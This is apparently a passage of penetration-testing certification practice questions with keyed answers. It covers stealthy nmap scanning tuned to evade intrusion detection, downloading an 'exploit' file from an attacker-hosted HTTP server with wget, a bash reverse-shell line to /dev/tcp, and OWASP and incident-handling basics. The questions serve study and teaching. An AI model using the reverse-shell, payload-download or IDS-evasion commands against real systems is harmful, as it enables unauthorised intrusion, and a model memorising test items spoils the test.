D. nmap -sS -O 192.168.1.2/24 -T1 The -sS option sends only a SYN packet to initiate a connection and never completes the full TCP handshake, which makes it less likely to be logged by intrusion detection systems (IDS) and firewalls. The -O option enables OS detection, which helps identify the type of device being scanned and can be useful in identifying vulnerabilities specific to that OS. The -T1 option sets the timing template to the second-slowest setting; this makes the scan slower but also less likely to trigger alarms and countermeasures.

A penetration tester ran the following command on a staging server: python -m SimpleHTTPServer 9891 Which of the following commands could be used to download a file named exploit to a target machine for execution? A. nc 10.10.51.50 9891 < exploit B. powershell -exec bypass -f \\10.10.51.50\9891 C. bash -i >& /dev/tcp/10.10.51.50/9891 0&1/exploit D. wget 10.10.51.50:9891/exploit

D. wget 10.10.51.50:9891/exploit This command uses the wget utility, which downloads files over HTTP, HTTPS and FTP. In this case, it connects to the IP address 10.10.51.50 on port 9891, where the exploit file is hosted by the Python SimpleHTTPServer, and downloads the file.

When developing a shell script intended for interpretation in Bash, the interpreter /bin/bash should be explicitly specified. Which of the following character combinations should be used on the first line of the script to accomplish this goal? A. <# B. <$ C. ## D. #$ E. #!

E. #!

Which of the following web-application security risks are part of the OWASP Top 10 v2017? (Choose two.) A. Buffer overflows B. Cross-site scripting C. Race-condition attacks D. Zero-day attacks E. Injection flaws F. Ransomware attacks

B. Cross-site scripting E. Injection flaws

Which of the following should a penetration tester do NEXT after identifying that an application being tested has already been compromised with malware? A. Analyze the malware to see what it does. B. Collect the proper evidence and then remove the malware. C. Do a root-cause analysis to find out how the malware got in. D. Remove the malware immediately. E. Stop the assessment and inform the emergency contact.

E. Stop the assessment and inform the emergency contact.
